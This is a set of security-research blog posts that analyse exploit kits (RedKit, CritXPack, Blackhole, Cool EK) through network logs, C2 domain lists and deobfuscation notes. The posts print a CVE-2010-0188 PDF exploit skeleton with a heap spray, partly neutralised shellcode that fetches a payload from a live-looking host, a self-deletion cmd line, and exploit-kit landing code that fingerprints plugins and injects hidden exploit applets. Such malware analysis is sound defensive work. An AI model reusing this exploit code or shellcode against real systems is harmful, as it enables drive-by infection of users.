Length: 6,418 (6.3K) [application/pdf]
02:47:10 (126.64 MB/s) - `987.pdf' saved [6418/6418]
There is a Javascript like below at in the PDF at 0xB1D-0x185C:
drols1 = event;
gerpsoi= "/*dbgbgfgd dswd*/CHoedsp0DCHoedsp0ACHoedsp76CHoe
edsp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoedsp2
20CHoedsp5FCHoedsp6BCHoedsp5FCHoedsp6DCHoedsp28CHoedsp29CHo
oedsp71CHoedsp56CHoedsp29CHoedsp0DCHoedsp0ACHoedsp7BCHoedsp
p71CHoedsp56CHoedsp29CHoedsp3BCHoedsp0DCHoedsp0ACHoedsp72CH
Hoedsp7BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoeds
sp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp65CHoedsp72CHoedsp20C
CHoedsp6ECHoedsp67CHoedsp74CHoedsp68CHoedsp20CHoedsp3CCHoed
dsp28CHoedsp76CHoedsp65CHoedsp72CHoedsp2CCHoedsp20CHoedsp31
2CHoedsp6CCHoedsp6FCHoedsp63CHoedsp6BCHoedsp28CHoedsp78CHoe
edsp20CHoedsp32CHoedsp20CHoedsp3CCHoedsp20CHoedsp6CCHoedsp6
:
:
..Hoedsp7DCHoedsp0DCHoedsp0A";

drols=drols1.target.creator;
function tplax(search, replace, subject) {
return subject.split(search).join(replace);}
function botoe(frodola,fiiio)
{ valueOf[cmfi](frodola);
valueOf[cmfi](Midias);}
var dsprpa = "i%ppd";
var cmfi = "e"+ drols1.target.author.toLowerCase().split("").reverse().join("");
ery= tplax("Anila/VCa;",'',drols);
botoe(ery,12);
var xchdfjh;
The PDF Evil JavaScript Source.Here's the evil code (neutralized) -->>[PASTEBIN]I use this code to get payload by simply simulate it ->>[PASTEBIN] There's an exploit CVE-2010-0188 in the decoded code, for the shellcode - execution, with the below structure:
splaui();
function splaui(){
var ver = get_ver();
if (ver >= 0x1f40){ // Exploit CVE-2010-0188
var tiff = 'SUkqADggAABB'; // LibTiff Integer aimed for overflow
var nops = make_str('QUFB', 0x2ae8);
var start = '
QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
var foot = '';
var sc_hex = '';
if (ver foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
var sc_hex = ''4c206..000'; //Shellcode
}
else { foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
sc_hex = '4c206..000';} //Shellcode
if (foot.length){
var ret = [tiff, nops, start, foot].join('');
var sc_str = hex2str(sc_hex);
var scode = str2uni(sc_str);
heap_spray3(scode);
rVBGo.rawValue = ret; }}}
And the shellcode is the below neutralized code:
4c 2O 6O Of O5 17 8O 4a  3c 2O 6O Of Of 63 8O 4a   L.`....J<.>a3 eb 8O 4a 3O 2O 82 4a  6e 2f 8O 4a 41 41 41 41   ...JO..Jn/.JAAAA
26 OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO &...............
12 39 8O 4a 64 2O 6O Of OO O4 OO OO 41 41 41 41 .9.Jd.`.....AAAA
41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 AAAAf......u4._3
cO 64 8b 4O 3O 8b 4O Oc 8b 7O 1c 56 8b 76 O8 33 .d.@O.@..p.V.v.3
db 66 8b 5e 3c O3 74 33 2c 81 ee 15 1O ff ff b8 .f.^<.t3>8b 4O 3O c3 46 39 O6 75 fb 87 34 24 85 e4 75 51 .@O.F9.u..4$..uQ
e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 O3 f5 56 8b ..LQV.u<.t5x..v.>76 2O O3 f5 33 c9 49 41 fc ad O3 c5 33 db Of be v...3.IA....3...

44 24 O8 2O 2d 73 2O 53 68 f8 OO OO OO ff 56 Oc D$..-s.Sh.....V.
8b e8 33 c9 51 c7 44 1d OO 77 7O 62 74 c7 44 1d ..3.Q.D..wpbt.D.
O5 2e 64 6c 6c c6 44 1d O9 OO 59 8a c1 O4 3O 88 ..dll.D...Y...O.
44 1d O4 41 51 6a OO 6a OO 53 57 6a OO ff 56 14 D..AQj.j.SWj..V.
85 cO 75 16 6a OO 53 ff 56 O4 6a OO 83 eb Oc 53 ..u.j.S.V.j....S
ff 56 O4 83 c3 Oc eb O2 eb 13 47 8O 3f OO 75 fa .V........G.?.u.
47 8O 3f OO 75 c4 6a OO 6a fe ff 56 O8 e8 9c fe G.?.u.j.j..V....
ff ff 8e 4e Oe ec 98 fe 8a Oe 89 6f O1 bd 33 ca ...N.......o..3.
8a 5b 1b c6 46 79 36 1a 2f 7O 68 74 74 7O 3a 2f .[..Fy6./phttp:/
2f 77 69 6e 64 65 72 6d 65 72 65 63 6f 74 74 61 /windermerecotta
67 65 2e 63 6f 2e 75 6b 2f 36 32 2e 68 74 6d 6c ge.co.uk/62.html
OO OO ..
And you cen see the un-obfuscated url for the payload in the end of the shellcode:
h00p://windermerecottage.co.uk/62.html
If you fetch it you'll get the binary malware setup.exe:
GET /62.html HTTP/1.0
Host: windermerecottage.co.uk
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:58:41 GMT
Server: Apache
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe Content-Length: 42496
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/octet-stream
200 OK
Length: 42,496 (42K) [application/octet-stream]
02:58:51 (128.68 KB/s) - `62.html' saved [42496/42496]
Looks like this:
Sections:
.code 0x1000 0x21f0 8704
.text 0x4000 0x41b4 16896
.rdata 0x9000 0x13c 512
.data 0xa000 0xd04 2560
.rsrc 0xb000 0x319c 12800

Compilation timedatestamp.....: 2013-01-11 15:44:17
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001000
packer: PureBasic 4.x -> Neil Hodgson - additionalPureBasic 4.x -> Neil Hodgson

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 51 33 F0 50 00 00 00 00 PE..L...Q3.P....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 64 00 00 ...........2.d..
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
: : :
After de-pack the binary, I found the below CMD command:
cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del %s
↑for the self-deletion purpose. And the complete strings are here -->>[PASTEBIN] If we execute this malware, we'll see setup.exe injected itself to a process: And it started making a DNS calls to the hosts below:
cash.taxi-soyuz.ru IN A +
orderindiantoronto.com IN A +
craportuense.com IN A +
stevenyang.ca IN A +
goediving.com IN A +
triathlonclub.sakura.ne.jp IN A +
ouedknouz.com IN A +
basement-gallery.com IN A +
boersenkeller-frankfurt.de IN A +
ex9.com.br IN A +
You can see the snapshot process' network activity: With more detail PoC in Wireshark: And starts making the HTTP/GET requests to below urls:
h00p://basement-gallery.com/h.htm
h00p://craportuense.com/i.htm
h00p://ouedknouz.com/c.htm
h00p://stevenyang.ca/p.htm
h00p://orderindiantoronto.com/k.htm
h00p://goediving.com/g.htm
h00p://ex9.com.br/t.htm
h00p://boersenkeller-frankfurt.de/w.htm
h00p://cash.taxi-soyuz.ru/l.htm
h00p://triathlonclub.sakura.ne.jp/o.htm
PoC: Actually these requests was so rapid & fast. In 3minutes it was 16,000+ requests: Not all the requests succeed reach the mothership, PoC:
--04:07:17--  h00p://triathlonclub.sakura.ne.jp/o.htm
Resolving triathlonclub.sakura.ne.jp... 59.106.27.164
Connecting to triathlonclub.sakura.ne.jp|59.106.27.164|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:18 ERROR 404: Not Found.

--04:07:57-- h00p://boersenkeller-frankfurt.de/w.htm
Resolving boersenkeller-frankfurt.de... 81.28.232.71
Connecting to boersenkeller-frankfurt.de|81.28.232.71|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:59 ERROR 404: Not Found.

--04:08:43-- h00p://orderindiantoronto.com/k.htm
Resolving orderindiantoronto.com... 174.132.192.130
Connecting to orderindiantoronto.com|174.132.192.130|:80... connected.
HTTP request sent, awaiting response... 500 Internal Server Error
04:08:44 ERROR 500: Internal Server Error.

--04:09:17-- h00p://ex9.com.br/t.htm
Resolving ex9.com.br... 200.98.246.160
Connecting to ex9.com.br|200.98.246.160|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:09:19 (0.00 B/s) - `t.htm' saved [0/0]

--04:09:44-- h00p://stevenyang.ca/p.htm
Resolving stevenyang.ca... 216.187.92.109
Connecting to stevenyang.ca|216.187.92.109|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:09:45 ERROR 404: Not Found.

--04:10:11-- h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:10:12 ERROR 404: Not Found.

--04:11:05-- h00p://ouedknouz.com/c.htm
Resolving ouedknouz.com... 213.186.33.3
Connecting to ouedknouz.com|213.186.33.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:06 (0.00 B/s) - `c.htm' saved [0/0]

--04:11:30-- h00p://goediving.com/g.htm
Resolving goediving.com... 72.167.232.31
Connecting to goediving.com|72.167.232.31|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:31 (0.00 B/s) - `g.htm' saved [0/0]

--04:12:23-- h00p://craportuense.com/i.htm
Resolving craportuense.com... 94.127.190.21
Connecting to craportuense.com|94.127.190.21|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:12:25 (0.00 B/s) - `i.htm' saved [0/0]

--04:12:49-- h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:12:49 ERROR 404: Not Found.
↑these domains served the htm file are- actually a compromised servers & implemented with the RedKit responder. Additionally, all of requests are using fake user agent below:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
↑This is important for compromised servers above to check access logs. BTW, one of the callback host has exceeded its HTTP traffic quota ;-)) We can't see significant registry changed or other dropped file except - the operations mentioned above. And furthermore, the malware process will suddenly stop/exit without errors. The previous case [HERE] also shows the same payload at the first infection. So, it is a nature of RedKit pack to download for more malwares by first payload. But this time all callback hosts looks unavailable to serve :-) I still wonder WHAT IF the callbacks are successfully returning response.. Virus Total checks currently shows only 5 AntiVirus can initially detect this first payload as malware:
SHA1: 7672f68845b3e43be76eb21559ae0f8e02407e6f MD5: 92899c20da4d9db5627af89998aadc58 File size: 41.5 KB ( 42496 bytes ) File name: setup.exe File type: Win32 EXE Tags: peexe Detection ratio: 5 / 46 Analysis date: 2013-01-11 19:15:32 UTC ( 2 hours, 48 minutes ago ) URL --->>[VirusTotal]Malware Names:Fortinet : W32/Zbot.ANM!tr Malwarebytes : Trojan.Bublik ByteHero : Virus.Win32.Heur.c Kaspersky : UDS:DangerousObject.Multi.Generic Ikarus : Trojan-Downloader.Win32.Karagany
Here's the full sample of this infection: Samples can be downloaded here -->>[MEDIAFIRE]PCAP & Regshot data can be downloaded here -->>[MEDIAFIRE] Detection rates is as follows (click the front numbers for link)
[1] Landing page VT (2/46) [2] PDF Infector VT (5/46) [3] Payload VT (5/46)
There are huge recent infection of Red Kit, which can be found below, as per announced by our fellow crusader: (thank's to @Set_Abominae) *) [NEW] CURRENT UrlQuery Link for RedKit -->>[HERE]
#MalwareMustDie

Some De-obfuscation notes on CritXPack Exploit Kit at root(.)kaovo.com

$
0
0
This is a quick memo of a crusade event, our encounter notes with CritXPack Exploit Kit, I think this will help others, so I dare to make documentation of the findings here as a guide. This is actually based on my memo so please bear the brief & incomplete explanation here and there.
Since we are focusing to the deobfuscation malware codes manually, I'm sorry that the payload information will not be included in this post (considering that the know-how on exploit kit's obfuscation is the target, thus the moronz can change the payload to anything they want anyway).

BTW, capture of the infected(?), I'd say an INFECTOR, site: (clean this up!)
The infector site's domain name is having Chinese registrant data:

Domain Name: kaovo.com
Registrant Contact:
juxiangpin
xiangpin ju bestpa1@hotmail.com
telephone: +86.02088889929
fax: +86.02088889927
kandung jinyang jinyang kandung 800267
CN
OK. Enough for the teaser, we'll make it quick, so here we go:

Starts with the below spam url:
h00p://www.themabbutt.com/index.php?cPath=24
We fetched the index.php:
Resolving www.themabbutt.com... seconds 0.00, 74.200.90.212
Caching www.themabbutt.com => 74.200.90.212
Connecting to www.themabbutt.com|74.200.90.212|:80... seconds 0.00, connected.
:
GET /index.php?cPath=24 HTTP/1.0
User-Agent: MMD Crusader
Host: www.themabbutt.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2013 08:15:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: osCsid=3f7fdcd550948f798d34ba0630c7f8c1; path=/; domain=themabbutt.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
200 OK
Length: unspecified [text/html]
17:15:14 (44.68 KB/s) - `index.php' saved
It has the double obduscation code in the end of the file: ↑Both the the obfuscation code has the same structure below:
// the obfuscation data:

if(1)
{ f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,1
105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,
97,139,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,
6,9,124,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,
:

// and the deobfuscation generator code:

for(i=0;-i+628!=0;i+=1)
{ j=i;
if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w「j」+j%4));
}
Use the ↑above logic & both obfs code will be burped deobfs code below: The second url will forward you to google, but - the first link's url if we download the source & see the inside, it contains the suspicious link as per below: I fetched it like this:
--17:21:10--  h00p://root.kaovo.com/n121212p/awsxd/i.php?token=speed/
=> `i.php@token=speed%2F'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/i.php?token=speed/ HTTP/1.0
Referer: h00p://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader Agent
Host: root.kaovo.com
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
After some "fun" effort receiving 302, finally we received the 1.php
$ ls -alF i.php
-rwx------ xxxx xxxx 2644 Jan 12 21:58 i.php*

MD5: 39583fcb535d2925a5000f4b8deae64a
PS, here's the server's headers:
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
A fail/blocked attempt will pass you to download yandex.ru's cookies:
HTTP/1.1 302 Found
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Location: h00p://www.yandex.ru/robots.txt
Vary: Accept-Encoding

The Landing Page Script

The i.php file contains 2 lines of the obfuscation script. It is the landing page of CritX Exploit Kit Let's make it more "viewable" structure :-) With the below explanation:
1. The pd.js is the PluginDetect 0.7.9 used to guard the pages of this EK. unlike the other EK, it is in seperated download and shared to other infector files. 2. The obfuscation code is found in the script, after passed checks on pd.js, it was a packed script as per shown in line 9. 3. There is a direct download infector in line 14 w/meta refrash tag method. 4. The moronz put the variable used for deobfuscation in other part (line 18).
Let's see the PluginDetect used:
--17:30:05--  h00p://root.kaovo.com/n121212p/awsxd/js/pd.js
=> `pd.js'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/js/pd.js HTTP/1.0
Referer: http://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader
Host: root.kaovo.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:29:56 GMT
Content-Type: application/javascript
Content-Length: 28592
Connection: keep-alive
Last-Modified: Thu, 22 Nov 2012 06:59:46 GMT
ETag: "2e0a69-6fb0-4cf1003249c80"
Accept-Ranges: bytes
Vary: Accept-Encoding
:
200 OK
Length: 28,592 (28K) [application/javascript]
17:30:08 (15.12 KB/s) - `pd.js' saved [28592/28592]
This is the inside, a one line script, hello PluginDetect 0.7.9

Decoding Obfuscation Infector Script

So how to decode the infector part? Let's see the good structure first: It is a simple structure, by feeding the generator by obfuscation data with eliminating garbages/unnecessary code we can get the deobfuscation script saved in the "e" variable here -->>[PASTEBIN] Seeing the codes, we'll see the infector is aiming to check your java version: (by fetching result from PluginDetect 0.7.9)
var GfkghfHqFF9 = (PluginDetect.getVersion("Java") + ".").toString().split(".");
if ((GfkghfHqFF9[0] == 1) &&(GfkghfHqFF9[1] == 7) &&(GfkghfHqFF9[3] Y9Nmp1nN7 = 7
}
else if ((GfkghfHqFF9[0] == 1) &&(GfkghfHqFF9[1] == 6) &&(GfkghfHqFF9[3] Y9Nmp1nN7 = 6
}
else if ((GfkghfHqFF9[0] == 1) &&(GfkghfHqFF9[1] Y9Nmp1nN7 = 5
}
else {
Y9Nmp1nN7 = 0
And your pdf version (fetching result from PluginDetect 0.7.9)
  var bqeVOXhTg9n = (PluginDetect.getVersion("AdobeReader") + ".")["toString"]().split("."  );
if ((bqeVOXhTg9n[0] == 8) || ((bqeVOXhTg9n[0] == 9) && (bqeVOXhTg9n[1] selJdFtA = 2
}
else {
selJdFtA = 0 }
The return value of 7, 6, 5, 2, 0 was used to trigger jars & PDF exploit file downloads described in the below functions:
// case of return code zero --->// redirected into YANDEX....
if ((selJdFtA == 0) && (Y9Nmp1nN7 == 0) && (b3RSQGB84 == 0)){
document.location.href = "h00p://root.kaovo.com/n121212p/awsxd/jpfoff.php?token=%64%65%66%61%75%6c%74&"

if (Y9Nmp1nN7 == 5){ // case of "5" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="a.Test" archive="j15.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXO5" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-tApXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')

if (Y9Nmp1nN7 == 6){ // case of "6" java exploit download
document.write('
 <div style="visibility:hidden">
 <applet code="a.Test" archive="j16.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYF" width="1" height="1">
 <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-trpXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
 </applet></div>')

if (Y9Nmp1nN7 == 7){ // case of "7" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="E" archive="j17.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYl" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-t1pXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')

if (selJdFtA == 2){ //case of "2" pdf exploit download
document.write('
<div style="visibility:hidden">
<object type="application/pdf" data="lpdf.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYxLk&" width="10" height="10">
</object></div>')}
↑The point is, three jars and a PDF exploit downloads are - the weapon of the current case of CritXPack Exploit Kit. The sample of these script infector are here --->>[MEDIAFIRE]Current infection landing page reference-1 at URLQuery -->>[URLQuery]Current infection's redirector reference-2 at URLQuery -->>[URLQuery]More CritXPack reference at Malware don't need Coffee -->>[HERE][UPDATED]*) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @MalwareSigs *) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @Set_Abominae
#MalwareMustDie!

Decoding #Guide: Double Obfuscation Blackhole Exploit Kit Landing Page (re-upload issue)

$
0
0
Dear MalwareMustDie Friends and Readers,

In weekdays we can't make writing in blogs due to daily works.
So we use our pastebin instead (see left menu) to post the reports.
However, in this findings we couldn't upload the text into pastebin well, so we use
dropbox instead, and turned out the documents can't be reached now.

Since the report is very important, we re-uploaded the guide to our blogspot instead.
Please find:

The Guide of Double Obfuscation Blackhole Exploit Kit Landing Page-->>[HERE]
Sample is in here (for research purpose only) -->>[HERE]
If you are looking for LATEST Blackhole Decode Guide is here -->>[Blog]

I'm sorry for the inconveniences & thank you for your kindly support #MalwareMustDie

Flushing, Peeling and Understanding the Cool Exploit Kit infection

$
0
0
It is nice to have another Exploit Kit adventure, really learn a lot of these adventures. After bumping here and there (all of the previous blogs in last weekend crusade was the cases I bumped into) we meet an active Cool Exploit Kit.

I was hinted the url with the hostname of hypnotherapyaz.com (thank's to a crusader who I can't mention it here) which were match to IP of what other researcher's (@kafeine) tweet, and accidentally has a correlation to a hacked domain owner: Bob Faith of what MalwareMustDie Tango Team is currently processing. The part of investigation text can be found here -->>[PASTEBIN].

I also seek the possible domain names used by the suspected server, as per below:

50f2c40a75730.buyliftem.org        A    64.120.190.183
50f3308d0dc4d.mentalfocus.org A 64.120.190.183
50f2d9ddf1471.azhypnotistbob.com A 64.120.190.183
50f2afa39be68.azreptheatre.com A 64.120.190.183
50f28a4b9a4fe.tempeazhomeloans.com A 64.120.190.183
50f30534b0cb0.hypnoaz.com A 64.120.190.183
50f34659158a0.mentalfocusaz.com A 64.120.190.183
50f31ac55ce66.hypnotherapyaz.com A 64.120.190.183

By knowing the possibility of the domain's landing page by reading references, I made the personal brute shell script for the possible landing page urls using the last strings of the suspected domains started from directory after news/ (and some others dirs too) to the landing pages like: Sale.Dilute.jsp, ray.dhtml, OPERATION.PHP5, etc etc..(the script was just made for FreeBSD only, after it's stable and supporting linux too we will upload it into our Google Project site).
All I did was just using the response 200 OK for the each calls in bruting the url, and the match just came up as per infector url below:

result of the IP 64.120.190.183:
h00p://50f31ac55ce66.hypnotherapyaz.com/news/Guilt.phtm
h00p://50f2d9ddf1471.azhypnotistbob.com/news/Bible.phps
h00p://50f2d9ddf1471.azhypnotistbob.com/news/Guilt.phtm

by the domain names burped by the brute I saw a certain pattern, so I expanded the search with the same method to wider network to find the below urls came from IP: 72.46.132.214↓

h00p://50f2e82b777c7.bobfaith.com/news/ARCHBISHOP/OPERATION.PHP5
h00p://50f2e0e1f35ef.azhypnotistbob.com/news/ARCHBISHOP/OPERATION.PHP5
h00p://50f2cb535212f.azhypno.com/news/ARCHBISHOP/OPERATION.PHP5
h00p://50f2e82b777c7.bobfaith.com/news/Sun_Relinquish.aspx
h00p://50f2e0e1f35ef.azhypnotistbob.com/news/Bible.phps
FYI, historically 72.46.132.214 was having below domain's pointer too of the same pattern of PseudoRandom Domain/DGA used by Cool Exploit Kit:
50f337d06c182.mentalfocus.org
50f3ec90cd3e0.sportsfocus.org
50f2a2c25a1f4.arizonareptheatre.com
50f2a86714d29.azreptheatre.com
50f289732df55.arizonarepertorytheatre.com
50f2b63491312.buyliftem.com
50f2cb535212f.azhypno.com
50f39fe3d7007.socialmediahypnotist.com
50f34d99e5ea9.quitsmokingaz.com
50f30c7628d58.hypnoaz.com
50f2f6b923593.healthhypnosisaz.com
50f2fdf67d0ad.healthhypnosisaz.com
50f33f178173a.mentalfocusaz.com
50f3294603c37.loseweightaz.com
50f322095740b.loseweightaz.com
50f3138673ee9.hypnotherapyaz.com
50f2bd7964ae8.buyliftem.net
50f282b40a901.bestbridalregistry.net
Go back to the track, the insides (code) of the landing page URL were so similar so I just took the first one for this post's analysis. With the details below:

The landing page looks like below:
↑As you can see the typical landing page of Cool Exploit Kit.


I fetched the landing page:

--19:28:07-- h00p://50f31ac55ce66.hypnotherapyaz.com/news/Guilt.phtm
=> `Guilt.phtm'
Resolving 50f31ac55ce66.hypnotherapyaz.com... seconds 0.00, 64.120.190.183
Caching 50f31ac55ce66.hypnotherapyaz.com => 64.120.190.183
Connecting to 50f31ac55ce66.hypnotherapyaz.com|64.120.190.183|:80... seconds 0.00, connected.
:
GET /news/Guilt.phtm HTTP/1.0
Referer: http://www.google.com/search?q=youtube
User-Agent: MalwareMustDie Draining Your Cool EK
Host: 50f31ac55ce66.hypnotherapyaz.com
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 14 Jan 2013 10:28:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.16
:
200 OK
Length: unspecified [text/html]
19:28:09 (41.02 KB/s) - `Guilt.phtm' saved [16046]
I neutralized with jinxed code here-->>[PASTEBIN]Without reading code you can grep the plain possible urls in it, to find below links:
h00p://50f31ac55ce66.hypnotherapyaz.com/news/tentative.jar
h00p://50f31ac55ce66.hypnotherapyaz.com/news/Shore_Rightly2.pdf
h00p://50f31ac55ce66.hypnotherapyaz.com/news/live1.pdf
h00p://50f31ac55ce66.hypnotherapyaz.com/news/INDUSTRIAL1.SWF
Oh yes, I drained it up, PoC: Here's all of the download logs as evidence :-) -->>[PASTEBIN]PS: the last attempt shown that the bad actors removed the jars:
$ cat tentative.jar
<b>ERROR 404 CONTENT</b>

Decoding & understanding how it infects us!

So let's peel the landing page code, this is a more structured code-->>[PASTEBIN]For the obfusctation, there were none. You'll see the condensed script and that's it. The trick of usage variable as wordings is used but wasn't difficult to figure it out. I wonder why a moronz must pay high price for a junk code like this. Honestly, I cannot say this is much smarter stuff than BHEK. Well, I will try to explain the infection part based on this structure.. In the first script it gets the Adobe version (self explanatory)
 try
{ control = new ActiveXObject('PDF.PdfCtrl'); }
catch (e) {} }
if (control)
{ isInstalled = true;
version = control.GetVersions().split(',');
version = version[0].split('=');
version = parseFloat(version[1]);
Roar=version;
pull=true; } }
in 2nd script it gets java ver of IE or Netscape(Mozilla):

if(br=='MSIE')
{
if(this.ax('1.7.0')) { immense[0]='1.7.0'}
else if(this.ax('1.6.0'))
{immense[0]='1.6.0'}
else if(this.ax('1.5.0'))
{ immense[0]='1.5.0'}
else if(this.ax('1.4.2'))
{immense[0]='1.4.2'}
else if(this.tm())
{immense[0]='1.1'}
}
else if(br=='Netscape Family')
{
this.gj();
if(this.Heredity!=null)
{ immense[0]=this.Heredity}
else if(this.tt('1.7'))
{immense[0]='1.7.0'}
else if(this.tt('1.6'))
{ immense[0]='1.6.0'}
else if(this.tt('1.5'))
{immense[0]='1.5.0' }
else if(this.tt('1.4.2'))
{immense[0]='1.4.2'} }
This is how it checks browsers (see the ver. well):
    ,g6:function()
{ if (this.Century == null)
{ var br=navigator.userAgent.toLowerCase();
if((br.indexOf('msie')!=-1)&&(br.indexOf('opera')==-1))
{this.Century='MSIE';
this.Sand='MSIE'
}
else if(br.indexOf('iphone')!=-1)
{this.Century='Netscape Family';
this.Sand='iPhone'
}
else if((br.indexOf('firefox')!=-1)&&(br.indexOf('opera')==-1))
{this.Century='Netscape Family';
this.Sand='Firefox'
}
else if(br.indexOf('chrome')!=-1)
{this.Century='Netscape Family';
this.Sand='Chrome'
}
else if(br.indexOf('safari')!=-1)
{this.Century='Netscape Family';
this.Sand='Safari'
}
else if((br.indexOf('mozilla')!=-1)&&(br.indexOf('opera')==-1))
{this.Century='Netscape Family';
this.Sand='Other'
}
else if(br.indexOf('opera')!=-1)
{ this.Century='Netscape Family';
this.Sand='Opera'
}
else
{ this.Century='?';
